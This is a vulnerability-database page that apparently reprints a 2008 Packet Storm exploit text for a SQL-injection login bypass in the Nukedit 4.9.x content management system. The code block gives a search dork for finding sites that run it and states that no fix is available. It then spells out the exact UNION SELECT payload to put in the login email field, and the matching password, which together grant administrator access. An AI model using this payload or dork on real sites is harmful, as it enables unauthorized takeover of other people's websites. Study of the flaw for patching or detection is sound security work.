Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

nukedit-sql.txt

🗓️ 25 Feb 2008 00:00:00Reported by r3dm0v3Type 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

Nukedit 4.9.x Login Bypass SQL injection discovered by r3dm0v3 from Tehran, Iran. Vulnerable versions 4.9.x and prior. Remote exploit with POC and multiple other injections

Show more
Code
`#Title: Nukedit 4.9.x Login Bypass SQL injection  
#  
#Discovered By: r3dm0v3  
# http://r3dm0v3.persianblog.ir  
# r3dm0v3( 4t ) yahoo [dot] com  
# Tehran - Iran  
#  
#Download: http://www.nukedit.com/content/Download.asp  
#Vulnerables: 4.9.x, prior versions maybe vulnerable  
#Remote: Yes  
#Dork: "Powered by Nukedit"  
# inurl:utilities/login.asp  
#Fix: Not Available  
  
  
  
#POC:  
#goto http://target.com/[path_to_nukedit]/utilities/login.asp and fill login fields as below:  
#Email: ' union select 1,1,'r3dm0v3',4,'ENCfc2aef9fe5f2c546429e2e1d9fd737e6da5b1b94707518619576129a915d0c2c',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from tblusers where 'x'='x  
#Password: r3dm0v3  
#Click Login and you will get in as an admin.  
  
  
#There some other sql injections in other pages.`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
25 Feb 2008 00:00Current
7.4High risk
Vulners AI Score7.4
nukeditsql injectionr3dm0v3tehraniranremotepocvulnerableadminexploit
25
.json
Report